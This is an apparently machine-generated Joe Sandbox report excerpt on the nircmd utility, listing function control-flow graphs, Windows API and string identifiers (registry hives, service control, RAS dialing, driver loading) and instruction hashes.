                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 940 140012ea4-140012eca 941 140012eda-140012edc 940->941 942 140012ecc-140012ece 941->942 943 140012ede 941->943 944 140012ee1-140012ee7 942->944 945 140012ed0-140012ed7 942->945 943->944 946 1400130e8 944->946 947 140012eed-140012f33 memset memcpy strlen 944->947 945->941 950 1400130ea-1400130fe 946->950 948 140012fd2-140012fe5 _stricmp 947->948 949 140012f39-140012f55 strcmp 947->949 953 1400130d8 948->953 954 140012feb-140012ffe _stricmp 948->954 951 140012fb1-140012fc2 strcmp 949->951 952 140012f57-140012f90 GetCurrentProcess GetModuleHandleA GetProcAddress 949->952 951->948 957 140012fc4-140012fcd 951->957 955 140012f92-140012f9a 952->955 956 140012f9f-140012fa7 952->956 958 1400130df-1400130e6 953->958 954->953 959 140013004-140013017 _stricmp 954->959 955->956 956->948 960 140012fa9-140012faf 956->960 957->948 958->950 961 14001301d-140013030 _stricmp 959->961 962 1400130cf-1400130d6 959->962 960->948 961->962 963 140013036-140013049 _stricmp 961->963 962->958 964 1400130c6-1400130cd 963->964 965 14001304b-14001305e _stricmp 963->965 964->958 965->964 966 140013060-140013073 _stricmp 965->966 967 140013075-140013088 _stricmp 966->967 968 1400130bd-1400130c4 966->968 967->968 969 14001308a-14001309d _stricmp 967->969 968->958 970 1400130b4-1400130bb 969->970 971 14001309f-1400130b2 _stricmp 969->971 970->958 971->946 971->970
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$strcmp$AddressCurrentHandleModuleProcProcessmemcpymemsetstrlen
                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$IsWow64Process$kernel32
                                                                                                                                                          • API String ID: 2141036351-2266215105
                                                                                                                                                          • Opcode ID: 5a9b4d2ebfcb7ca27c116e400d554c9e65084c889a8cc568ed75fa38b54fe3c8
                                                                                                                                                          • Instruction ID: 03e0c9fc1ac73ad18f62884833f2f8505307ad101f7cb9fdc7626c37a46b7a22
                                                                                                                                                          • Opcode Fuzzy Hash: 5a9b4d2ebfcb7ca27c116e400d554c9e65084c889a8cc568ed75fa38b54fe3c8
                                                                                                                                                          • Instruction Fuzzy Hash: 3A61527120864591FA239B67D8503E963A0B78D7D9F844221FB9D4F2FAEB3EC649C701
                                                                                                                                                          Function 0000000140006000 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 154stringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1018 140006000-140006042 memset 1019 140006045-14000604f 1018->1019 1020 14000605f-140006061 1019->1020 1021 140006051-140006053 1020->1021 1022 140006063-140006066 1020->1022 1023 140006055-14000605c 1021->1023 1024 14000606a-140006078 1021->1024 1022->1024 1023->1020 1025 140006093-140006098 strcpy 1024->1025 1026 14000607a-140006091 memcpy 1024->1026 1027 14000609d-1400060b0 _stricmp 1025->1027 1026->1027 1028 1400060b2-1400060b7 1027->1028 1029 1400060bc-1400060cf _stricmp 1027->1029 1030 140006217-140006219 1028->1030 1031 1400060d1-1400060d6 1029->1031 1032 1400060db-1400060ee _stricmp 1029->1032 1030->1019 1033 14000621f-140006243 1030->1033 1031->1030 1034 1400060fa-14000610d _stricmp 1032->1034 1035 1400060f0-1400060f5 1032->1035 1036 140006119-14000612c _stricmp 1034->1036 1037 14000610f-140006114 1034->1037 1035->1030 1038 140006137-14000614a _stricmp 1036->1038 1039 14000612e-140006132 1036->1039 1037->1030 1040 140006155-140006168 _stricmp 1038->1040 1041 14000614c-140006150 1038->1041 1039->1030 1042 140006173-140006186 _stricmp 1040->1042 1043 14000616a-14000616e 1040->1043 1041->1030 1044 140006191-1400061a4 _stricmp 1042->1044 1045 140006188-14000618c 1042->1045 1043->1030 1046 1400061a6-1400061aa 1044->1046 1047 1400061ac-1400061bf _stricmp 1044->1047 1045->1030 1046->1030 1048 1400061c1-1400061c5 1047->1048 1049 1400061c7-1400061da _stricmp 1047->1049 1048->1030 1050 1400061e2-1400061ec 1049->1050 1051 1400061dc-1400061e0 1049->1051 1052 1400061f2-1400061f8 1050->1052 1053 1400061ee-1400061f0 1050->1053 1051->1030 1054 14000620d-14000620f 1052->1054 1055 1400061fa-14000620b atoi 1052->1055 1053->1052 1053->1054 1054->1030 1056 140006211-140006214 1054->1056 1055->1030 1056->1030
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$memcpymemsetstrcpy
                                                                                                                                                          • String ID: alt$ctrl$del$enter$esc$ext$ins$plus$shift$spc$tab
                                                                                                                                                          • API String ID: 3459562133-135616249
                                                                                                                                                          • Opcode ID: 6e422e7c37258ca0749c572ea6fdf11ec55f6ebd975a3a4db1ea66ae77a3b171
                                                                                                                                                          • Instruction ID: 42eaff5a021c40af156afd777bea661533bdfda3d418ec6d98fbf7e106bc669d
                                                                                                                                                          • Opcode Fuzzy Hash: 6e422e7c37258ca0749c572ea6fdf11ec55f6ebd975a3a4db1ea66ae77a3b171
                                                                                                                                                          • Instruction Fuzzy Hash: 495175B1248A4690FA32EB23E4403EA6762F79D3C8F844111BB995F5F6EB39CA45D700
                                                                                                                                                          Function 0000000140002304 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 129COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1057 140002304-140002369 memset call 140015bbe 1060 140002425-140002444 call 140002060 1057->1060 1061 14000236f-140002380 call 140015bb8 1057->1061 1068 140002446-14000244e 1060->1068 1069 140002459-140002462 1060->1069 1066 140002382-14000238e wcscpy 1061->1066 1067 140002393-1400023a4 _wcsicmp 1061->1067 1066->1067 1070 1400023a6-1400023b7 _wcsicmp 1067->1070 1071 1400023b9-1400023c5 wcscpy 1067->1071 1068->1069 1072 140002464-140002472 malloc 1069->1072 1073 1400024d5 1069->1073 1070->1071 1075 1400023ca-1400023db _wcsicmp 1070->1075 1071->1075 1072->1073 1074 140002474-140002491 call 140002060 1072->1074 1076 1400024d8-1400024f1 1073->1076 1082 140002493-140002498 1074->1082 1083 14000249d-1400024a6 1074->1083 1078 1400023dd-1400023ee _wcsicmp 1075->1078 1079 1400023f0-1400023fc wcscpy 1075->1079 1078->1079 1081 140002401-140002412 _wcsicmp 1078->1081 1079->1081 1081->1060 1084 140002414-140002420 wcscpy 1081->1084 1082->1083 1085 1400024a8 1083->1085 1086 1400024cd-1400024d0 free 1083->1086 1084->1060 1087 1400024ac-1400024bb wcscmp 1085->1087 1086->1073 1088 1400024f2-14000250b free 1087->1088 1089 1400024bd-1400024cb 1087->1089 1088->1076 1089->1086 1089->1087
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcsicmp$wcscpy$free$mallocmemsetwcscmp
                                                                                                                                                          • String ID: .bmp$.gif$.jpeg$.jpg$.tif$.tiff$image/bmp$image/gif$image/jpeg$image/png$image/tiff
                                                                                                                                                          • API String ID: 3849900952-929284103
                                                                                                                                                          • Opcode ID: 8e54a8f5abe41eb2a71239e0af0c8cc42f9c5d87c669eb7520c0b3f8e42a5a5c
                                                                                                                                                          • Instruction ID: 4e8253b579e92e325f360c18bfa193e519d52dcbe52212e0b334d528a247a820
                                                                                                                                                          • Opcode Fuzzy Hash: 8e54a8f5abe41eb2a71239e0af0c8cc42f9c5d87c669eb7520c0b3f8e42a5a5c
                                                                                                                                                          • Instruction Fuzzy Hash: 2F513772204B8185EA66EB27E8903D963A0F78C7C5F844125BF4D4B6B6EF7ACA45C700
                                                                                                                                                          Function 0000000140002060 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 60libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1090 140002060-140002072 1091 140002074-140002077 1090->1091 1092 14000207c-14000208f LoadLibraryA 1090->1092 1093 140002164-14000216e 1091->1093 1094 140002162 1092->1094 1095 140002095-14000215e GetProcAddress * 10 1092->1095 1094->1093 1095->1094
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: GDIPlus.dll$GdipCreateBitmapFromFile$GdipCreateBitmapFromHBITMAP$GdipCreateHBITMAPFromBitmap$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipLoadImageFromFile$GdipSaveImageToFile$GdiplusShutdown$GdiplusStartup
                                                                                                                                                          • API String ID: 2238633743-2224569043
                                                                                                                                                          • Opcode ID: d996370c4debf284b02148ee346fe787d3db98b36d7b45c99d847acb80946ca3
                                                                                                                                                          • Instruction ID: 1bec540ea7c8356643ada24de899d2b38e87fa2c9731069a32b938b8c5152827
                                                                                                                                                          • Opcode Fuzzy Hash: d996370c4debf284b02148ee346fe787d3db98b36d7b45c99d847acb80946ca3
                                                                                                                                                          • Instruction Fuzzy Hash: B4319175205F42A2EB12DB5AE98439833B5F78C780F509016EB5D4B764EF7AD178C300
                                                                                                                                                          Function 0000000140013490 Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 101stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memicmp$??2@??3@strcatstrchrstrcpystrlen
                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                          • API String ID: 4235429862-909552448
                                                                                                                                                          • Opcode ID: e2e1c1ba4afc3aec1d0eb2bcaf5f7ee809e6f2d43bf666a5f212ea4694f24003
                                                                                                                                                          • Instruction ID: 598543e5feca7aa7acf38441ceb326934bc0558f49e494268c5133010f56fa43
                                                                                                                                                          • Opcode Fuzzy Hash: e2e1c1ba4afc3aec1d0eb2bcaf5f7ee809e6f2d43bf666a5f212ea4694f24003
                                                                                                                                                          • Instruction Fuzzy Hash: 86419070209A4081FB16EB17A9513E92792A74EFC4F844021FF4A4F7B6EF7EC6468304
                                                                                                                                                          Function 0000000140013728 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 65libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: ChangeServiceConfigA$CloseServiceHandle$ControlService$EnumServicesStatusA$OpenSCManagerA$OpenServiceA$QueryServiceConfigA$QueryServiceStatus$StartServiceA$advapi32.dll
                                                                                                                                                          • API String ID: 2238633743-2061868645
                                                                                                                                                          • Opcode ID: 220d6a12f5d4a0cf41183c0e817fa3b38a47c55e93e0454996570b43e0413bdd
                                                                                                                                                          • Instruction ID: ff4856ff5c30fe739e3524e4a1c80e4c23632d1d59cc2534aa63bd54212d3b22
                                                                                                                                                          • Opcode Fuzzy Hash: 220d6a12f5d4a0cf41183c0e817fa3b38a47c55e93e0454996570b43e0413bdd
                                                                                                                                                          • Instruction Fuzzy Hash: 81410734505F51A0EB579B1BE8983E433A2F78E7D8F440116FA4A8B2B0EF7E8588C311
                                                                                                                                                          Function 0000000140005E4C Relevance: 33.3, APIs: 10, Strings: 9, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                          • String ID: aux$headphones$line$master$microphone$phone$synth$wavein$waveout
                                                                                                                                                          • API String ID: 2884411883-1911086473
                                                                                                                                                          • Opcode ID: c42ed021920e311820d8d69cee748f9158c37a999edcc09722a4616b37bb707b
                                                                                                                                                          • Instruction ID: 50eafc804a200018c1485bf9b000a06f9eeb1643703ca0d42c5fa779217599ec
                                                                                                                                                          • Opcode Fuzzy Hash: c42ed021920e311820d8d69cee748f9158c37a999edcc09722a4616b37bb707b
                                                                                                                                                          • Instruction Fuzzy Hash: 1A31C4B031424391FA17F627AD453FA1255679E7C6F885032BF468F2B6FA7EC9848201
                                                                                                                                                          Function 0000000140011C7C Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                          • Opcode ID: 0747091873b1feb192102cf35764ce19c5cec60a8ad56001e0c04282ef4e160e
                                                                                                                                                          • Instruction ID: 4bda61860724a2677fab9a8476a53cf0087da7959cea70fd98659846d7cefe2a
                                                                                                                                                          • Opcode Fuzzy Hash: 0747091873b1feb192102cf35764ce19c5cec60a8ad56001e0c04282ef4e160e
                                                                                                                                                          • Instruction Fuzzy Hash: E1214634649F56A1EA02DB17F8843C033B5BB8E7D4F841116EA0A4B630EF7EC299C345
                                                                                                                                                          Function 000000014000B020 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 186sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$Sleep
                                                                                                                                                          • String ID: D8U$cmdwait$loop$multiremote$paramsfile$qboxcom$remote$showerror
                                                                                                                                                          • API String ID: 1567616336-3420881610
                                                                                                                                                          • Opcode ID: db635e5d4d8bc2a0a7db3f722b2340cbad5d34a2c5bdddad21282dad8ec80874
                                                                                                                                                          • Instruction ID: 923186fc3dc26fa67c8ceec125f5c9beb448bedef99086930392639462003345
                                                                                                                                                          • Opcode Fuzzy Hash: db635e5d4d8bc2a0a7db3f722b2340cbad5d34a2c5bdddad21282dad8ec80874
                                                                                                                                                          • Instruction Fuzzy Hash: F571D0F260468486EA63DF27B8843EE37A5F3287C8F504421EF564B6B1EB79D586C304
                                                                                                                                                          Function 000000014000B069 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 171sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$Sleep
                                                                                                                                                          • String ID: D8U$cmdwait$loop$multiremote$paramsfile$qboxcom$remote$showerror
                                                                                                                                                          • API String ID: 1567616336-3420881610
                                                                                                                                                          • Opcode ID: 8bdf148e4bbfd716d7f5b1712cf604f001df6feec86b55b111edd74c5c46750d
                                                                                                                                                          • Instruction ID: a6a51bc05b09784e161f33345eeeffdcf3b4cf1b13f42e3cb9729208196c52da
                                                                                                                                                          • Opcode Fuzzy Hash: 8bdf148e4bbfd716d7f5b1712cf604f001df6feec86b55b111edd74c5c46750d
                                                                                                                                                          • Instruction Fuzzy Hash: 306103F260428486EA27EF26F8857EE3395F7187C8F544021EF564B6B5EB39D586C304
                                                                                                                                                          Function 0000000140011D84 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 79libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AddressFreeLoadProc$ErrorLast$CloseCurrentHandleProcess
                                                                                                                                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$OpenProcessToken$advapi32.dll
                                                                                                                                                          • API String ID: 4015073967-4270423970
                                                                                                                                                          • Opcode ID: 0fb3417205d42720390d8397688da7d31a04927ef3a560848cc2ed21f18e6e3e
                                                                                                                                                          • Instruction ID: 388c9ae7a87a0a39a04e6146993687fe80c6f17d85724cd09ebae98e0e853602
                                                                                                                                                          • Opcode Fuzzy Hash: 0fb3417205d42720390d8397688da7d31a04927ef3a560848cc2ed21f18e6e3e
                                                                                                                                                          • Instruction Fuzzy Hash: A6310131205B4196EB569B96B844BE963B1BB8CBC0F484129BF4E4B775EF3EC149C700
                                                                                                                                                          Function 0000000140008DAC Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 131windowstringthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Windowmemset$Item_stricmp$ClassMessageNameProcessSendTextThreadVisiblestrcmp
                                                                                                                                                          • String ID: #32770$click$settext
                                                                                                                                                          • API String ID: 508377637-3905513361
                                                                                                                                                          • Opcode ID: 2682245596379fb2c8348c94f1e84426a7c1aedd799acd2ccaa3296cd8f5abb4
                                                                                                                                                          • Instruction ID: 4c187adb369be6ec4c47d4af19de0711901cedbf50dd32c38b924312c24cea1e
                                                                                                                                                          • Opcode Fuzzy Hash: 2682245596379fb2c8348c94f1e84426a7c1aedd799acd2ccaa3296cd8f5abb4
                                                                                                                                                          • Instruction Fuzzy Hash: 1F5183B270468187EB26DB26E8513E96352FB9CBC5F444121FF8D4B6A6EB3DC605C700
                                                                                                                                                          Function 000000014000718C Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$??3@LibraryLoad
                                                                                                                                                          • String ID: RasDialA$RasEnumConnectionsA$RasGetConnectStatusA$RasGetEntryDialParamsA$RasHangUpA$RasSetEntryDialParamsA$rasapi32.dll
                                                                                                                                                          • API String ID: 3057795744-1206557285
                                                                                                                                                          • Opcode ID: 8e251ee8d8382435bee67c174f125282a903e4728428e133c78529865585d203
                                                                                                                                                          • Instruction ID: 7017ebf89f838599755f02ba6e76957890e942502ad09df1f0599e57e5256fc9
                                                                                                                                                          • Opcode Fuzzy Hash: 8e251ee8d8382435bee67c174f125282a903e4728428e133c78529865585d203
                                                                                                                                                          • Instruction Fuzzy Hash: 9A4124B2601B9991EA82DB52E948BDA73A8FB897D0F410111FF4C1B370DF39C885C310
                                                                                                                                                          Function 0000000140007050 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 60libraryloadersleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoadSleep
                                                                                                                                                          • String ID: RasDialA$RasEnumConnectionsA$RasGetConnectStatusA$RasGetEntryDialParamsA$RasHangUpA$RasSetEntryDialParamsA$rasapi32.dll
                                                                                                                                                          • API String ID: 4087116157-1206557285
                                                                                                                                                          • Opcode ID: 39ed4dc4af701b95e17890d0ccf9f1c7d390ea2c3c5e81c01c3f80905f10cf9e
                                                                                                                                                          • Instruction ID: eddf5262ed154b440d0d40df95280a4afd4eccd91825fed0b94c22a334033d29
